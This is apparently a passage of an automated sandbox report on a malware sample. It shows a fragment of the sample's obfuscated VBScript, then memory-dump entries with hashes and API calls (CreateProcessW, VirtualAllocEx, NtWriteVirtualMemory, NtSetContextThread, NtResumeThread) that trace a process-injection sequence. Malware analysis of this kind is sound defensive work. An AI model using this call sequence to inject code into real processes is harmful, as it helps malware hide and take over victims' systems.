                                              fdyhjdfyfghjfhygyjfyjdfjfgyjfgjfgtujxftgh = 100

                                              64

                                              Call fthdsthdfAxgfhhd()

                                              fthdsthdfAxgfhhd

                                              65

                                              Function fthdsthdfAxgfhhd() ' BAD !

                                              66

                                              fthdsthdfAxgfhhd

                                              fthdsthdfAxgfhhd

                                              67

                                              End Function


                                                Execution Graph

                                                Execution Coverage: 60.4%
                                                Dynamic/Decrypted Code Coverage: 100%
                                                Signature Coverage: 95.2%
                                                Total number of Nodes: 63
                                                Total number of Limit Nodes: 0

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8!p$\X2
                                                • API String ID: 0-4130623958
                                                • Opcode ID: a30485a2f863b9951010c7e6e605a2460ba9fec735ad3a5c99ef9c9e89ceec4b
                                                • Instruction ID: 6cb0dc191a18f45d86a45e924ab37ba932c85206a374e88b8af53c90affdcd03
                                                • Opcode Fuzzy Hash: a30485a2f863b9951010c7e6e605a2460ba9fec735ad3a5c99ef9c9e89ceec4b
                                                • Instruction Fuzzy Hash: 70A13270A00258CFEB40DFA9C544A9EFBB2FF88301F19C5A5D409AB266D738D942CB95
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,
                                                • API String ID: 0-3772416878
                                                • Opcode ID: acadad6190200dbf454d62e84b72e7ac1115997e12a87c433b35ef6c86c72465
                                                • Instruction ID: ea5b28cbed3e8aa69b7ee8050a489cce67dd87804c91ae3559af6c834e9a8baa
                                                • Opcode Fuzzy Hash: acadad6190200dbf454d62e84b72e7ac1115997e12a87c433b35ef6c86c72465
                                                • Instruction Fuzzy Hash: B872F370A012658BE761DF28C848B9AF7B2EF49301F25C5E5D40DAB262D738DE81CF95
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,
                                                • API String ID: 0-3772416878
                                                • Opcode ID: 6b1cbef713128be45360ad419b825bb3006f153f36883445be84c0e89b434379
                                                • Instruction ID: 853bb0c221d35b534ac2890dedc604a111d525855802b92db4ec7618368db83c
                                                • Opcode Fuzzy Hash: 6b1cbef713128be45360ad419b825bb3006f153f36883445be84c0e89b434379
                                                • Instruction Fuzzy Hash: E2720470A002658BE761EF68C948B9AF7B2EF48301F1585E5D40DAB362D738DE81CF95

                                                Control-flow Graph: function at 384110 (calls CreateProcessW and internal function 3803f8); graph image not reproduced
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 0038455F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: b30fc632da41e6957d4b43a76fb720e8761cbebaa66e64a36c23a0c172c12d81
                                                • Instruction ID: e89d64a8e1002c6f9a12c4d48c2187345703393e5ab5238314e0ff958975c102
                                                • Opcode Fuzzy Hash: b30fc632da41e6957d4b43a76fb720e8761cbebaa66e64a36c23a0c172c12d81
                                                • Instruction Fuzzy Hash: F402E374D00329CFEB65DFA9C881B9DBBB1BF49304F1081AAE419B7250DB74AA85CF54

                                                Control-flow Graph: function at 384104 (calls CreateProcessW and internal function 3803f8); graph image not reproduced
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 0038455F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: bc01288fbedd2e1e2d778dda79bad587b55e34205583fb12834ac5f90a729ffe
                                                • Instruction ID: 515287959645b1a98c475e1dc3d1a33885f9176fc5f412ca85a46341e3ca994d
                                                • Opcode Fuzzy Hash: bc01288fbedd2e1e2d778dda79bad587b55e34205583fb12834ac5f90a729ffe
                                                • Instruction Fuzzy Hash: F4F1E274D00329CFEB25DFA9C881B9DBBB1BF49304F1081AAE819B7250DB749A85CF54

                                                Control-flow Graph: function at 385318 (calls NtWriteVirtualMemory); graph image not reproduced
                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 003853E8
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID:
                                                • API String ID: 3527976591-0
                                                • Opcode ID: 7fe4e35ad66cb4104b68ffa62a2f94d07e4979b881ce18b5b14c6d5611285918
                                                • Instruction ID: 299e02c7345cda3148e5ecbb9635ad675bf9aa5d71d0d66ee98a1730e4ac5a7f
                                                • Opcode Fuzzy Hash: 7fe4e35ad66cb4104b68ffa62a2f94d07e4979b881ce18b5b14c6d5611285918
                                                • Instruction Fuzzy Hash: 6141A8B5D012589FCF00CFA9D984AEEFBF1BB49310F24942AE815B7250D379AA45CB64

                                                Control-flow Graph: function at 384fc1 (calls NtReadVirtualMemory); graph image not reproduced
                                                APIs
                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0038507A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID: MemoryReadVirtual
                                                • String ID:
                                                • API String ID: 2834387570-0
                                                • Opcode ID: 438ee6253f41abbe109728cbfdeae13ab8c9557f715b834f7cb45eaaba2f727d
                                                • Instruction ID: 059bcead2d9dc787918833e984e80b1f5cff2971f79322d5bf5cbfd2274da89f
                                                • Opcode Fuzzy Hash: 438ee6253f41abbe109728cbfdeae13ab8c9557f715b834f7cb45eaaba2f727d
                                                • Instruction Fuzzy Hash: 4A41B9B5D002589FCF00CFA9D884AEEFBB1BF4A310F24946AE814B7210C735A945CF64

                                                Control-flow Graph: function at 384fc8 (calls NtReadVirtualMemory); graph image not reproduced
                                                APIs
                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0038507A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID: MemoryReadVirtual
                                                • String ID:
                                                • API String ID: 2834387570-0
                                                • Opcode ID: 5b64737c1d6e3bc609d4696642c1841762237a012c7e5a75f2cec2d3273a7abf
                                                • Instruction ID: c9eaa378ac3a50763dc397eec806bfc0f230d9db0cec446eab66ac0ba8424c57
                                                • Opcode Fuzzy Hash: 5b64737c1d6e3bc609d4696642c1841762237a012c7e5a75f2cec2d3273a7abf
                                                • Instruction Fuzzy Hash: FD41A9B5D00258DFCF00CFAAD984AEEFBB1BB49310F20942AE814B7210D735A945CF64

                                                Control-flow Graph: function at 385469 (calls NtSetContextThread); graph image not reproduced
                                                APIs
                                                • NtSetContextThread.NTDLL(?,?), ref: 0038551F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: 58f59fc7a5fc6e4f15012db9699963ff371c119b596cda5a7fc4773591fea0f3
                                                • Instruction ID: 00c7fd532561f084eaca8eb43db22b5d20ffd6ffda03a79e32738d7189eb1143
                                                • Opcode Fuzzy Hash: 58f59fc7a5fc6e4f15012db9699963ff371c119b596cda5a7fc4773591fea0f3
                                                • Instruction Fuzzy Hash: CC41ECB4D012589FCB10CFA9D884AEEFBF1BF49310F24806AE405B7250C338A989CF54

                                                Control-flow Graph: function at 385470 (calls NtSetContextThread); graph image not reproduced
                                                APIs
                                                • NtSetContextThread.NTDLL(?,?), ref: 0038551F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: 1c14208377f593a2c982ade616b9eeadb20aca800801c75c0b4e0728442d7a9b
                                                • Instruction ID: c943215835f20849c822f344a4dc2f66902fc5acfa7fe7f0cd914b70cb493f14
                                                • Opcode Fuzzy Hash: 1c14208377f593a2c982ade616b9eeadb20aca800801c75c0b4e0728442d7a9b
                                                • Instruction Fuzzy Hash: 9331DDB4D012589FCB10DFAAD884AEEFBF1BF49310F24802AE415B7210D738A989CF54

                                                Control-flow Graph: function at 3850f8 (calls NtResumeThread); graph image not reproduced
                                                APIs
                                                • NtResumeThread.NTDLL(?,?), ref: 00385181
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 7f2d90318563f0046ef23600da58b1665cf3c8531fa1edbd95807396279fadb2
                                                • Instruction ID: 2b2e4fce35c510df32952cd11d2221f338325d4018e705941eae51146ab1bed5
                                                • Opcode Fuzzy Hash: 7f2d90318563f0046ef23600da58b1665cf3c8531fa1edbd95807396279fadb2
                                                • Instruction Fuzzy Hash: 2531A7B5D012189FCF10CFA9D985ADEFBB5BB49310F20942AE815B7310C775A945CFA4

                                                Control-flow Graph: function at 38083a (internal calls to 381071, 380140, 381589, 38180f, 380520, 380530, 3834af, 38722e); graph image not reproduced
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d20db6cdfe4d361ffb4b033c3cf944c1e42175fcddd4b848944b56a11baa0b42
                                                • Instruction ID: 27c70bd1d0e57dca5488d883390d966447878834d34b13f8b1221cfc0dc56a66
                                                • Opcode Fuzzy Hash: d20db6cdfe4d361ffb4b033c3cf944c1e42175fcddd4b848944b56a11baa0b42
                                                • Instruction Fuzzy Hash: 62322830A002948FE7A4DFB8D440B4EFBB2EF49301F25C5A9D449EB662D738D985CB95

                                                Control-flow Graph: function at 380848 (internal calls to 381071, 380140, 381589, 38180f, 380520, 380530, 3834af, 38722e); graph image not reproduced
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 142b01739950f101a2344ded45a700656a60d2509dcf44fe001643e9775d1ce8
                                                • Instruction ID: 0190e10fe3a5b45829e1293822280e3fc5e358a716cda985b9a7b9a128b3ee1c
                                                • Opcode Fuzzy Hash: 142b01739950f101a2344ded45a700656a60d2509dcf44fe001643e9775d1ce8
                                                • Instruction Fuzzy Hash: C5321730A002548FE7A4DFB8D440B4EFBB2EF49301F25C5A9D449EB662D738D985CB95

                                                Control-flow Graph: function at 3846e2 (internal calls to 380140, 384c02, 38075c and to 384fc1/384fc8, the NtReadVirtualMemory wrappers); graph image not reproduced
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b06bf87dc05069f61d2e0e0b62490a5de791f210f2018b8437691ecc6267f796
                                                • Instruction ID: 848918facfe4b4b0839dca8c4bb15affa40fcfa4d1365bbabb28c5f5014cf10f
                                                • Opcode Fuzzy Hash: b06bf87dc05069f61d2e0e0b62490a5de791f210f2018b8437691ecc6267f796
                                                • Instruction Fuzzy Hash: 72F12630A002958FEB51DFA8C440B9EFBB2EF49300F25C5AAD409EB756D738D981CB95

                                                Control-flow Graph: function at 3846f0 (internal calls to 380140, 384c02, 38075c and to 384fc1/384fc8, the NtReadVirtualMemory wrappers); graph image not reproduced
Memory Dump Source
• Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
Similarity
• Opcode ID: 93d76d9c57d238b86c365fe788963b0a948b4fe39c013001153f2e0893d92ad5
• Instruction ID: e460d960cec070f2c40141b85c39bf21fb57491f0b5c5a824c118bca29200428
• Opcode Fuzzy Hash: 93d76d9c57d238b86c365fe788963b0a948b4fe39c013001153f2e0893d92ad5
• Instruction Fuzzy Hash: 31F11530A002598FEB54DFA9C440B9EFBB2EF48300F25C5AAD409EB656D738D981CF95

Control-flow Graph
Memory Dump Source
• Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
Similarity
• Opcode ID: 813eb00a0210b2cce743193410cdf66381e3619db7604f3b8890daf106ab59a3
• Instruction ID: c42b0273e8c51ec3ded1a44710a95d3b8cae6c6689da5a28945e75b0f71ab3e9
• Opcode Fuzzy Hash: 813eb00a0210b2cce743193410cdf66381e3619db7604f3b8890daf106ab59a3
• Instruction Fuzzy Hash: C2E12570A002588FEB50DFA9C44078EFBB2FF88301F65C5A9D409EB652DB38D981CB95

Memory Dump Source
• Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
Similarity
• Opcode ID: e114e76cfe998b300293ce7e8f92e3e800c33c6c620e09f2f7144f2a3329d018
• Instruction ID: dec6986f0a9cd4350f24dc128839f9c780decd683f8a9eaa2642ad0eb04717b2
• Opcode Fuzzy Hash: e114e76cfe998b300293ce7e8f92e3e800c33c6c620e09f2f7144f2a3329d018
• Instruction Fuzzy Hash: 40B1E174E002188FDB54DFA9C884B9EFBB6BF89300F2481AAD419A7355DB349986CF51

Memory Dump Source
• Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
Similarity
• Opcode ID: 6cc5cb11ced29c36a40a1d340e71e6a9af247de86d18ecf65dfab30df1f4e335
• Instruction ID: 3ab67735869e9ffb36605f884ad5c5241ea7579d3a316a7a3efcbb21ae5bd269
• Opcode Fuzzy Hash: 6cc5cb11ced29c36a40a1d340e71e6a9af247de86d18ecf65dfab30df1f4e335
• Instruction Fuzzy Hash: E4819774E00218CFDB58DFBAD895A9DBBF2BF89300F14806AE419AB355DB34A945CF50

Memory Dump Source
• Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
Similarity
• Opcode ID: 657a76937df22f5fa7cad9519b2b0ebe290322e4fc62aedc6353b5525caf22d7
• Instruction ID: ce4c149e6d7b194a35af16668ee8653070df0a4e6d894a6caed3030e4915b1e4
• Opcode Fuzzy Hash: 657a76937df22f5fa7cad9519b2b0ebe290322e4fc62aedc6353b5525caf22d7
• Instruction Fuzzy Hash: AB514834E002858FE741DFA9C54469EFBF2EF49301F29C5A5C408EB266D738D942CBA1

Control-flow Graph
control_flow_graph 554 3851f8-3852b2 VirtualAllocEx 557 3852bb-385305 554->557 558 3852b4-3852ba 554->558 558->557
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 003852A2
Memory Dump Source
• Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
Similarity
• API ID: AllocVirtual
• API String ID: 4275171209-0
• Opcode ID: 6174fb91d1e8b2bacc31ac6c6288c37dae5a5adc4f2efacb4bfaf9ffb2b6a39e
• Instruction ID: 3f125f76e209086db6d694dfb7d9e6ed8084cd2045d82292931e773d31127a18
• Opcode Fuzzy Hash: 6174fb91d1e8b2bacc31ac6c6288c37dae5a5adc4f2efacb4bfaf9ffb2b6a39e
• Instruction Fuzzy Hash: 2D3187B9D002589FCF10CFA9D985ADEFBB5BB49310F20942AE815B7310D735A945CF64